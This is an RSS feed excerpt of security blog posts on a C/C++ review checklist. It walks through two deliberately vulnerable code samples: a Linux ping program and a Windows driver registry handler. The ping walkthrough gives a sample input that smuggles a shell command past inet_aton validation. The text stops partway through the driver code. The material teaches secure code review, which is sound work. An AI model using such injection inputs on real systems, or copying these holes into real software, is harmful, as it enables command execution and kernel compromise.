</span></span><span class="line"><span class="cl"> <span class="n">PWCHAR</span> <span class="n">regPath</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">bufferLength</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// fetch the product registry path from the request
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="n">status</span> <span class="o">=</span> <span class="nf">WdfRequestRetrieveInputBuffer</span><span class="p">(</span><span class="n">Request</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regPath</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">bufferLength</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">NT_SUCCESS</span><span class="p">(</span><span class="n">status</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Failed to retrieve input buffer. Status: %d"</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">status</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">status</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="cm">/* check that the buffer size is a null-terminated
</span></span></span><span class="line"><span class="cl"><span class="cm"> Unicode (UTF-16) string of a sensible size */</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">bufferLength</span> <span class="o">&lt;</span> <span class="mi">4</span> <span class="o">||</span>
</span></span><span class="line"><span class="cl"> <span class="n">bufferLength</span> <span class="o">&gt;</span> <span class="mi">512</span> <span class="o">||</span>
</span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">bufferLength</span> <span class="o">%</span> <span class="mi">2</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span> <span class="o">||</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">[(</span><span class="n">bufferLength</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="sa">L</span><span class="sc">'\0'</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Buffer length %d was incorrect."</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">bufferLength</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">STATUS_INVALID_PARAMETER</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="n">ProductVersionInfo</span> <span class="n">version</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
</span></span><span class="line"><span class="cl"> <span class="n">HandlerCallback</span> <span class="n">handlerCallback</span> <span class="o">=</span> <span class="n">NewCallback</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">readValue</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="c1">// read the major version from the registry
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="n">RTL_QUERY_REGISTRY_TABLE</span> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> <span class="nf">RtlZeroMemory</span><span class="p">(</span><span class="n">regQueryTable</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">RTL_QUERY_REGISTRY_TABLE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Name</span> <span class="o">=</span> <span class="sa">L</span><span class="s">"MajorVersion"</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">EntryContext</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Flags</span> <span class="o">=</span> <span class="n">RTL_QUERY_REGISTRY_DIRECT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">QueryRoutine</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">status</span> <span class="o">=</span> <span class="nf">RtlQueryRegistryValues</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">RTL_REGISTRY_ABSOLUTE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">NT_SUCCESS</span><span class="p">(</span><span class="n">status</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Failed to query registry. Status: %d"</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">status</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">status</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_INFORMATION</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Major version is %d"</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">readValue</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">version</span><span class="p">.</span><span class="n">Major</span> <span class="o">=</span> <span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">version</span><span class="p">.</span><span class="n">Major</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="c1">// versions prior to 3.0 need an additional check
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="nf">RtlZeroMemory</span><span class="p">(</span><span class="n">regQueryTable</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">RTL_QUERY_REGISTRY_TABLE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Name</span> <span class="o">=</span> <span class="sa">L</span><span class="s">"MinorVersion"</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">EntryContext</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Flags</span> <span class="o">=</span> <span class="n">RTL_QUERY_REGISTRY_DIRECT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">QueryRoutine</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">status</span> <span class="o">=</span> <span class="nf">RtlQueryRegistryValues</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">RTL_REGISTRY_ABSOLUTE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">NT_SUCCESS</span><span class="p">(</span><span class="n">status</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Failed to query registry. Status: %d"</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">status</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">status</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_INFORMATION</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Minor version is %d"</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">readValue</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">version</span><span class="p">.</span><span class="n">Minor</span> <span class="o">=</span> <span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">DoesVersionSupportNewCallback</span><span class="p">(</span><span class="n">version</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="n">handlerCallback</span> <span class="o">=</span> <span class="n">OldCallback</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="nf">SetGlobalHandlerCallback</span><span class="p">(</span><span class="n">handlerCallback</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span></span></span></code></pre>
</figure>
<h2>We’re not done yet</h2>
<p>Our goal is to continuously update the handbook, including this chapter, so that it remains a key resource for security practitioners and developers who are involved in the source code security review process. If your favorite gotcha is not there, please <a href="https://github.com/trailofbits/testing-handbook">send us a PR</a>.</p>
<p>Checklist-based review, even combined with skilled-up LLMs, is only a single step in securing a system. Do it, but remember that it’s just a starting point for manual review, not a substitute for deep expertise. If you need help securing your C/C++ systems, <a href="https://www.trailofbits.com/contact/">contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[C/C++ checklist challenges, solved]]></title>
<description><![CDATA[We recently added a C/C++ security checklist to the Testing Handbook and challenged readers to spot the bugs in two code samples: a deceptively simple Linux ping program and a Windows driver registry handler. If you found the inet_ntoa global buffer gotcha or the missing RTL_QUERY_REGISTRY_TYPECH...]]></description>
<link>https://tsecurity.de/de/3501360/it-security-nachrichten/cc-checklist-challenges-solved/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501360/it-security-nachrichten/cc-checklist-challenges-solved/</guid>
<pubDate>Fri, 08 May 2026 23:18:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We recently added a <a href="https://appsec.guide/docs/languages/c-cpp/">C/C++ security checklist</a> to the Testing Handbook and <a href="https://blog.trailofbits.com/2026/04/09/master-c-and-c-with-our-new-testing-handbook-chapter/">challenged readers to spot the bugs in two code samples</a>: a deceptively simple Linux ping program and a Windows driver registry handler. If you found the <code>inet_ntoa</code> global buffer gotcha or the missing <code>RTL_QUERY_REGISTRY_TYPECHECK</code> flag, nice work. If not, here’s a full walkthrough of both challenges, plus a deep dive into how the Windows registry type confusion escalates from a local denial of service to a kernel write primitive.</p>
<p>Since we first released the new C/C++ security checklist, we also developed a new Claude skill, <a href="https://github.com/trailofbits/skills/tree/main/plugins/c-review">c-review</a>. It turns the checklist into bug-finding prompts that an LLM can run against a codebase. It’s also platform and threat-model aware. Run these commands to install the skill:</p>
<pre>
claude skills add-marketplace https://github.com/trailofbits/skills
claude skills enable c-review --marketplace trailofbits/skills
</pre>
<h2>The Linux ping program challenge</h2>
<p>The Linux warmup challenge we showed you in the last blog post has an obvious command injection issue.</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;arpa/inet.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl"><span class="cp">#define ALLOWED_IP "127.3.3.1"
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">ip_addr</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">in_addr</span> <span class="n">to_ping_host</span><span class="p">,</span> <span class="n">trusted_host</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// get address
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">fgets</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">),</span> <span class="n">stdin</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">ip_addr</span><span class="p">[</span><span class="nf">strcspn</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// verify address
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">inet_aton</span><span class="p">(</span><span class="n">ip_addr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">to_ping_host</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">ip_addr_resolved</span> <span class="o">=</span> <span class="nf">inet_ntoa</span><span class="p">(</span><span class="n">to_ping_host</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// prevent SSRF
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">((</span><span class="nf">ntohl</span><span class="p">(</span><span class="n">to_ping_host</span><span class="p">.</span><span class="n">s_addr</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">24</span><span class="p">)</span> <span class="o">==</span> <span class="mi">127</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// only allowed
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">inet_aton</span><span class="p">(</span><span class="n">ALLOWED_IP</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">trusted_host</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">trusted_resolved</span> <span class="o">=</span> <span class="nf">inet_ntoa</span><span class="p">(</span><span class="n">trusted_host</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">ip_addr_resolved</span><span class="p">,</span> <span class="n">trusted_resolved</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// ping
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kt">char</span> <span class="n">cmd</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">cmd</span><span class="p">),</span> <span class="s">"ping '%s'"</span><span class="p">,</span> <span class="n">ip_addr</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="nf">system</span><span class="p">(</span><span class="n">cmd</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span></span></span></code></pre>
</figure>
<p>There are three validations that have to be bypassed before the <code>system</code> call can be reached with malicious inputs:</p>
<ol>
<li>The <a href="https://man7.org/linux/man-pages/man3/inet.3.html"><code>inet_aton</code> function</a> “converts the Internet host address from the IPv4 numbers-and-dots notation into binary form” and “returns nonzero if the address is valid, zero if not.” Theoretically, if we provide an invalid IPv4 string as input, then the program should return early.</li>
<li>The <code>ntohl</code> call aims to prevent server-side request forgery (SSRF) attacks by disallowing addresses in 127.0.0.0/8 range.</li>
<li>The parsed IP address is normalized with an <code>inet_ntoa</code> call and compared against the <code>ALLOWED_IP</code>. We are only allowed to ping localhost, which should not be possible given the SSRF check (making the code effectively broken with this configuration).</li>
</ol>
<p>The issue with the <code>inet_aton</code> function is that it <a href="https://sourceware.org/bugzilla/show_bug.cgi?id=20018">accepts trailing garbage</a>. This behavior is not documented on its man page, making it a likely source of vulnerabilities. In our challenge, one can simply send “127.0.0.1 ‘; anything #” as valid input.</p>
<p>The gotcha with <code>inet_ntoa</code> is that it returns a pointer to a global buffer. Therefore, subsequent calls to the function overwrite previous outputs. In the challenge, <code>ip_addr_resolved</code> and <code>trusted_resolved</code> are the same pointer. When we provide “1.2.3.4” as input, <code>ip_addr_resolved</code> points to the string “1.2.3.4”, the SSRF check passes, the second call to <code>inet_ntoa</code> makes the <code>ip_addr_resolved</code> pointer point to “127.3.3.1”, and so the <code>strcmp</code> check passes too.</p>
<p>There are a few more functions that return pointers to static buffers; these are documented in the new C/C++ Testing Handbook chapter.</p>
<h2>The Windows driver registry challenge</h2>
<p>We showed you this Windows Driver Framework (WDF) request handler from a Windows driver and asked you to spot the bugs.</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">NTSTATUS</span>
</span></span><span class="line"><span class="cl"><span class="nf">InitServiceCallback</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">_In_</span> <span class="n">WDFREQUEST</span> <span class="n">Request</span>
</span></span><span class="line"><span class="cl"><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="n">NTSTATUS</span> <span class="n">status</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">PWCHAR</span> <span class="n">regPath</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">bufferLength</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="c1">// fetch the product registry path from the request
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="n">status</span> <span class="o">=</span> <span class="nf">WdfRequestRetrieveInputBuffer</span><span class="p">(</span><span class="n">Request</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regPath</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">bufferLength</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">NT_SUCCESS</span><span class="p">(</span><span class="n">status</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Failed to retrieve input buffer. Status: %d"</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">status</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">status</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="cm">/* check that the buffer size is a null-terminated
</span></span></span><span class="line"><span class="cl"><span class="cm"> Unicode (UTF-16) string of a sensible size */</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">bufferLength</span> <span class="o">&lt;</span> <span class="mi">4</span> <span class="o">||</span>
</span></span><span class="line"><span class="cl"> <span class="n">bufferLength</span> <span class="o">&gt;</span> <span class="mi">512</span> <span class="o">||</span>
</span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">bufferLength</span> <span class="o">%</span> <span class="mi">2</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span> <span class="o">||</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">[(</span><span class="n">bufferLength</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="sa">L</span><span class="sc">'\0'</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Buffer length %d was incorrect."</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">bufferLength</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">STATUS_INVALID_PARAMETER</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="n">ProductVersionInfo</span> <span class="n">version</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
</span></span><span class="line"><span class="cl"> <span class="n">HandlerCallback</span> <span class="n">handlerCallback</span> <span class="o">=</span> <span class="n">NewCallback</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">readValue</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="c1">// read the major version from the registry
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="n">RTL_QUERY_REGISTRY_TABLE</span> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> <span class="nf">RtlZeroMemory</span><span class="p">(</span><span class="n">regQueryTable</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">RTL_QUERY_REGISTRY_TABLE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Name</span> <span class="o">=</span> <span class="sa">L</span><span class="s">"MajorVersion"</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">EntryContext</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Flags</span> <span class="o">=</span> <span class="n">RTL_QUERY_REGISTRY_DIRECT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">QueryRoutine</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">status</span> <span class="o">=</span> <span class="nf">RtlQueryRegistryValues</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">RTL_REGISTRY_ABSOLUTE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">NT_SUCCESS</span><span class="p">(</span><span class="n">status</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Failed to query registry. Status: %d"</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">status</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">status</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_INFORMATION</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
